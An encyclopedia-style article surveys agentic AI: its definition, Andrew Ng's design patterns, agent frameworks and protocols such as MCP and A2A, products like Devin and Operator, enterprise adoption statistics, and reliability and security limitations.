Agentic AI
Last reviewed
May 7, 2026
Sources
20 citations
Review status
Source-backed
Revision
v1 · 3,900 words
Improve this article
Add missing citations, update stale details, or suggest a clearer explanation.
Last reviewed
May 7, 2026
Sources
20 citations
Review status
Source-backed
Revision
v1 · 3,900 words
Add missing citations, update stale details, or suggest a clearer explanation.
Agentic AI refers to artificial intelligence systems that can take autonomous, multi-step actions to accomplish goals, rather than simply responding to individual prompts. Unlike traditional chatbots or AI assistants that answer one question at a time and wait for the next instruction, agentic systems receive a high-level objective and then plan, execute, and iterate through a sequence of steps on their own, often using external tools, browsing the web, writing and running code, or coordinating with other AI agents. The term gained wide currency in 2024 when Andrew Ng, the AI Fund founder and former head of Google Brain, presented it at Sequoia Capital's AI Ascent conference, and it was subsequently adopted by Gartner, McKinsey, and most major AI labs as the dominant framing for the next generation of AI deployment.
Gartner named agentic AI the top strategic technology trend for 2025, defining it as systems that "possess the capability to act autonomously to complete tasks" within defined guardrails. McKinsey described agentic AI as "a system based on generative AI foundation models that can act in the real world and execute multistep processes." As of 2026, adoption has spread rapidly: roughly 79% of organizations report some level of agentic AI deployment, though fewer than one in nine runs such systems in full production.
The word "agentic" comes from "agency," the capacity of an entity to act independently in pursuit of a goal. Applied to AI, agentic behavior means a system can perceive its environment, reason about what to do, choose and invoke tools or sub-processes, observe the results, and loop back until the goal is reached or the system determines it cannot proceed.
Agentic AI overlaps with, but is broader than, several related concepts. An AI agent is any system that acts on behalf of a user; the agentic AI framing emphasizes the class of agents built on large language models (LLMs) that reason in natural language and use a wide variety of tools. An agentic workflow describes the specific sequence of steps such a system follows. The term agentic AI, as it emerged in 2024-2026, typically refers to the overall paradigm: LLM-based systems capable of operating autonomously over extended periods with minimal human intervention.
Some researchers distinguish between "AI agents" (a long-standing term in academic AI, referring to any goal-directed system) and the newer class of "LLM-powered autonomous agents" that can reason, plan, and act through natural language. In industry usage, the two phrases are often interchangeable.
The agentic AI movement coalesced around a framework that Andrew Ng presented in March 2024, first at Sequoia Capital's AI Ascent event and then in a widely circulated LinkedIn post and DeepLearning.AI newsletter. Ng described four design patterns that distinguish agentic workflows from simple prompt-response interactions:
Reflection is the pattern by which an LLM examines its own output and iterates. Instead of returning an answer to the user immediately, the system prompts itself to review what it produced, identify errors or gaps, and revise. A coding agent using reflection might generate a function, run it, observe any error messages, and then rewrite the function based on those observations. This loop can repeat many times. Reflection draws on earlier work in AI self-evaluation and is related to techniques like constitutional AI and critique-revision prompting.
Tool use (artificial intelligence) is the ability of an LLM to invoke external functions, APIs, or services. Rather than relying only on knowledge baked into its weights, an agent with tool use can search the web, run code, read files, call a database, send emails, or interact with virtually any software system that exposes an interface. OpenAI formalized this capability as "function calling" in its API in June 2023, and it has become standard across virtually all frontier model providers. Tool use is what lets an agentic system actually affect the world, not just describe it.
Planning refers to the agent's ability to decompose a high-level goal into a sequence of steps and then execute them in order, adjusting when unexpected results appear. Planning is often implemented through chain-of-thought prompting or through explicit scratchpad outputs where the agent writes out its intended steps before taking them. More sophisticated planning involves tree-of-thought approaches or model-based reasoning that evaluates multiple possible sequences before committing to one. Planning is the pattern most closely tied to the "autonomous" quality of agentic AI: a system that can only respond to individual instructions is reactive, while one that plans is proactive.
Multi-agent collaboration means distributing work across several specialized agents that coordinate to complete tasks that would be too large or complex for a single agent. One agent might gather research, a second might draft a report, a third might critique and revise it, and a fourth might format and deliver it. Ng noted that multi-agent workflows are more difficult to control because the system's behavior is harder to predict in advance, but that they consistently produce better results on complex tasks. This pattern maps onto Agentic AI Foundation architectures and is central to how production systems at companies like Salesforce, ServiceNow, and Atlassian are structured.
Ng argued that agentic reasoning, applied to existing models, could yield more improvement per dollar than continued scaling of model size, stating at AI Ascent that $100,000 spent on agentic reasoning could outpace $100 million spent on training larger models for many practical tasks.
The technical building blocks of agentic AI accumulated over several years before the term became mainstream.
In 2022, Google researchers published the ReAct (Reasoning + Acting) framework, which showed that LLMs could interleave natural language reasoning with discrete actions such as querying Wikipedia. This established the basic loop that most modern agentic systems still follow: think, act, observe, repeat.
In June 2023, OpenAI introduced function calling in the GPT API, giving developers a structured way to expose tools to language models. That same spring, AutoGPT (released March 2023 by Toran Bruce Richards) and BabyAGI (shared by Yohei Nakajima in April 2023) became viral on GitHub, with AutoGPT attracting more than 50,000 stars in its first month. These early systems were often brittle, looping forever or producing incoherent plans, but they demonstrated the appetite for autonomous AI and surfaced the key failure modes.
LangChain, launched in October 2022, became the dominant library for building LLM-powered applications and agents, providing abstractions for memory, tool use, and chains of calls. By 2024, LangGraph had emerged from the LangChain ecosystem as a dedicated orchestration layer for complex, stateful agent workflows.
In early 2024, Andrew Ng's presentations and the launch of Devin (March 2024) by Cognition Labs shifted the conversation from research curiosity to production readiness. Devin was marketed as the world's first AI software engineer, capable of handling entire coding tasks end to end. By the second half of 2024, major AI labs had all launched or announced dedicated agent offerings, and enterprise pilots were multiplying rapidly.
Several software frameworks handle the orchestration logic that agentic AI requires: managing state across steps, routing between agents, handling failures, and streaming results back to users.
LangGraph is an open source library, MIT licensed, maintained by LangChain. It models agent workflows as directed graphs where nodes are processing steps and edges define transitions, including conditional branches and cycles. LangGraph supports durable execution, meaning an agent can survive failures and resume from a checkpoint, human-in-the-loop pauses where a person can inspect and modify the agent's state, and both short-term and long-term memory. Companies such as Klarna, Replit, and Elastic have used LangGraph in production. Between Q1 2024 and Q1 2025, LangChain (the broader ecosystem) saw a 220% increase in GitHub stars and a 300% increase in package downloads.
CrewAI is an open source Python framework built independently of LangChain. Its organizing metaphor is the crew: each agent receives a role (researcher, writer, critic, manager), a goal, and a backstory, and agents collaborate as a team. CrewAI supports sequential, hierarchical, and consensual process types. In a hierarchical process, a manager agent delegates tasks to worker agents; in consensual processes, agents vote on decisions. CrewAI has become the second most widely searched agent framework, popular with marketing teams and small-to-mid-size businesses that want a low-barrier entry into multi-agent automation.
The OpenAI Agents SDK was released in March 2025, replacing the earlier experimental Swarm library. Its core abstraction is the handoff: agents explicitly transfer control to other agents along with conversational context. Each agent is defined by instructions, a model reference, a set of tools, and a list of agents it can hand off to. OpenAI updated the SDK in April 2026 to add improved enterprise safety features and guardrails. The SDK is designed for production use, with tracing, error handling, and support for parallel agent execution.
The Claude Agent SDK is Anthropic's framework for building agents that use Claude models. Anthropic takes a tool-use-first design philosophy: agents are Claude models augmented with tools, and sub-agents are invoked as tools of a parent agent, creating a supervisor tree. The SDK integrates tightly with the Model Context Protocol so that any MCP-compatible tool or data source can be connected to an agent without custom integration code.
Google introduced the Agent Development Kit (ADK) in April 2025 as part of Google Cloud. ADK uses a hierarchical agent tree, where a root agent manages a set of child agents, mirroring the supervisor pattern. ADK has native support for Gemini's multimodal capabilities, so agents can process images, audio, and video in addition to text. ADK is designed for deployment on Google Cloud infrastructure and integrates with Vertex AI for model hosting and monitoring.
As agentic AI systems multiplied, two open protocols emerged to solve coordination problems that no single framework could address alone.
The Model Context Protocol (MCP) is an open standard introduced by Anthropic in November 2024 to standardize how AI systems connect to external tools and data sources. Before MCP, each integration required custom code, creating what developers described as an "N times M problem": connecting ten AI applications to one hundred tools could require up to one thousand custom connectors. MCP solved this by defining a single client-server protocol, transported over JSON-RPC 2.0, that any tool provider can implement once and that any MCP-compatible AI client can then use.
In March 2025, OpenAI adopted MCP across its products, including the ChatGPT desktop application. In December 2025, Anthropic donated MCP governance to the Agentic AI Foundation (AAIF), a directed fund under the Linux Foundation co-founded by Anthropic, Block, and OpenAI. By early 2026, thousands of MCP servers existed, covering databases, code execution environments, web browsers, calendar systems, and many other integrations.
The Agent2Agent Protocol (A2A) was announced by Google in April 2025 with support from more than 50 technology and consulting partners, including Salesforce, SAP, ServiceNow, Deloitte, McKinsey, and Accenture. A2A solves a different problem than MCP: where MCP connects an agent to tools, A2A enables agents built by different vendors and on different frameworks to communicate with each other.
A2A introduces four capabilities: Agent Cards (JSON documents that describe what an agent can do), task management with defined lifecycle states, context sharing for long-running collaborative tasks, and user experience negotiation so that agents can agree on how to present results. In June 2025, Google donated A2A governance to the Linux Foundation under the Apache 2.0 license. By April 2026, more than 150 organizations had formally adopted the protocol.
A2A and MCP are complementary: MCP governs the relationship between an agent and its tools, while A2A governs the relationship between agents and other agents.
Devin (AI software engineer) was released by Cognition Labs on March 12, 2024, and was widely described as the first AI software engineer capable of handling an entire software task autonomously. Devin plans a project, writes code, runs tests, debugs errors, searches documentation online, and can deploy the finished application. On the SWE-bench benchmark, which asks agents to resolve real GitHub issues in open-source projects, Devin resolved 13.86% of issues end-to-end at launch, compared to a previous state-of-the-art of 1.96%. Cognition was founded by ten engineers, including CEO Scott Wu, and was funded by Founders Fund. Devin subsequently attracted Goldman Sachs as an enterprise customer, where it was deployed as part of a "hybrid workforce" initiative. Reception was mixed: early praise was followed by critical analysis from reviewers who found the public demos did not fully represent the system's reliability on unscripted tasks.
Manus AI launched in invitation-only beta on March 6, 2025, developed by Butterfly Effect, a startup backed by Tencent Holdings. Manus positioned itself as a general AI agent, meaning it attempted to handle a broader range of tasks than domain-specific agents. The launch demo, which showed the agent autonomously screening job applications and conducting stock analysis, drew more than one million views within twenty hours. Manus distinguishes itself technically through a "Manus's Computer" interface that lets users observe and intervene in the agent's actions in real time. In a notable turn, Manus shelved a planned Chinese-language version that had been announced as a partnership with Alibaba's Qwen team, closed its Chinese-language social media accounts, and blocked access from mainland China.
OpenAI Operator was announced on January 23, 2025, and made available as a limited-access research preview to ChatGPT Pro subscribers in the United States on February 1, 2025. Operator is powered by a model called Computer-Using Agent (CUA), which combines GPT-4o's vision capabilities with reinforcement learning training on graphical user interfaces. Operator can navigate websites, fill out forms, book travel, make restaurant reservations, and complete shopping tasks by controlling a browser autonomously. It set new benchmark results on WebArena and WebVoyager, two key browser-use evaluations at the time of its release. As of July 17, 2025, Operator was integrated directly into ChatGPT as the "ChatGPT agent" feature.
Computer use is a capability introduced by Anthropic in October 2024 for Claude 3.5 Sonnet. It allows Claude to take screenshots, move a cursor, click buttons, type text, and otherwise interact with a desktop or web environment in the same way a human user would. Unlike Operator, which controls a browser, Claude's computer use capability works across the full desktop. Companies including Asana, Canva, Cognition, DoorDash, Replit, and The Browser Company integrated computer use into their platforms during its beta period. Anthropic has continued expanding computer use support across Claude model generations.
By 2025 and 2026, agentic AI had moved from research labs to enterprise procurement conversations.
Gartner predicted in its 2025 strategic technology trends report that at least 15% of day-to-day work decisions will be made autonomously through agentic AI by 2028, up from near zero in 2024. Gartner also projected that 33% of enterprise software applications will include agentic AI by 2028, up from less than 1% in 2024. In a more cautionary note, Gartner predicted in June 2025 that more than 40% of agentic AI projects would be canceled by the end of 2027, citing escalating costs, unclear business value, and inadequate risk controls.
G2's August 2025 enterprise survey found that 57% of companies had AI agents in production, 22% were in pilot, and 21% were pre-pilot. The AI agents market is projected to exceed $10.9 billion in 2026, up from approximately $7.7 billion in 2025, at a compound annual growth rate above 45%. Enterprise deployments that do reach production have reported average returns on investment of 171%, according to Arcade Research's 2025 survey, with US enterprises reporting closer to 192%.
Software development and customer service are the two use cases most commonly cited by enterprises in production. Gartner predicted that by 2029, agentic AI would autonomously resolve 80% of common customer service issues, cutting operational costs by 30%.
Agentic AI has been applied across a wide range of domains:
| Domain | Representative application |
|---|---|
| Software engineering | Full software task completion (Devin, GitHub Copilot Workspace, Cursor) |
| Research | Multi-source synthesis and report generation (OpenAI Deep Research, Perplexity) |
| Customer service | Autonomous ticket resolution and escalation routing |
| Web automation | Booking travel, filling forms, scraping data (Operator, Browser Use) |
| Data analysis | Pulling from databases, running calculations, generating visualizations |
| Document workflows | Contract review, summarization, redlining |
| IT operations | Incident triage, automated remediation, infrastructure provisioning |
| Sales | Lead research, personalized outreach drafting, CRM updates |
| Healthcare | Clinical note generation, prior authorization, appointment scheduling |
| Finance | Reconciliation, fraud pattern detection, regulatory report drafting |
Despite rapid adoption, agentic AI systems face reliability problems that meaningfully distinguish them from traditional software.
A factual error in a chatbot answer is merely misleading. A hallucinated action taken by an autonomous agent, such as calling a non-existent API endpoint, deleting the wrong file, or submitting incorrect information to a third-party service, can cause irreversible damage. Researchers have termed this the "hallucination in action" problem.
In multi-step workflows, errors compound. A single mistake in an early reasoning step can propagate through subsequent steps, producing a cascade of failures by the end of the task. In multi-agent systems, the problem is more severe: a bad decision by one agent can propagate across interconnected workflows affecting other agents.
Agents also sometimes enter infinite loops, retrying a failed action repeatedly without modifying their approach. This is distinct from hallucination but equally disruptive in production systems.
Common mitigation strategies include:
The NIST AI Risk Management Framework was updated in 2025 to include specific guidance for agentic AI, requiring organizations to map all agent tool access permissions and implement circuit breakers.
Legal RAG (retrieval-augmented generation) systems, one of the more mature deployment patterns, still hallucinate citations between 17% and 33% of the time in 2025 assessments. The overall failure rate for production deployment remains high: one study found that 88% of AI agents fail to reach production from pilot, though those that do reach production deliver significant ROI.
The following table summarizes the main differences between agentic AI systems and the earlier generation of AI assistants and chatbots:
| Dimension | Traditional AI assistant / chatbot | Agentic AI |
|---|---|---|
| Interaction model | Responds to each user prompt individually | Receives a goal and works autonomously through multiple steps |
| Tool access | Limited or none | Broad: web, code execution, APIs, file systems |
| Memory | Typically stateless within a session | Can maintain state across steps; some systems persist memory across sessions |
| Error handling | Returns incorrect answer or fails silently | Can observe errors, retry, or escalate |
| Human involvement | Required for every action | Can operate with minimal human input; human-in-the-loop optional |
| Output type | Text response | Actions taken in the world plus a summary |
| Task length | One exchange | Minutes to hours or longer |
| Risk profile | Misinformation | Misinformation plus irreversible real-world actions |
| Typical interface | Chat window | Background process, dashboard, or embedded in other software |
Beyond reliability, agentic AI faces several structural limitations as of 2026.
Long context degradation: While context windows have grown substantially, LLM attention quality tends to degrade over very long contexts, which means agents that accumulate too much history in a single session can make progressively worse decisions.
Alignment drift: In extended autonomous operation, an agent's behavior can diverge from user intent in ways that are difficult to detect without continuous monitoring. The problem is more acute when agents are coordinating with each other, because misaligned sub-goals can compound.
Cost: Multi-step agentic runs consume many more tokens than single-turn interactions. Complex agent tasks can cost dollars per run on frontier models, which limits scalability for high-volume use cases.
Security exposure: Agents that have access to tools, APIs, and file systems dramatically expand the attack surface compared to read-only assistants. Prompt injection attacks, in which malicious content in a retrieved document hijacks the agent's instructions, are a practical concern in 2025 deployments. The CSO Online assessment in 2025 described the agentic AI boom as "a CISO's worst nightmare" because agents with broad tool access could exfiltrate data or trigger unintended actions if compromised.
Explainability: When an agent produces an incorrect result after dozens of steps, tracing the root cause is substantially harder than auditing a single model response. This is a compliance problem in regulated industries such as healthcare and finance.
Over-reliance on individual models: Most agentic frameworks depend on a single frontier model for orchestration, which means quality, latency, and cost are all tightly coupled to that model's performance. Model provider outages or price changes propagate directly to agent system availability.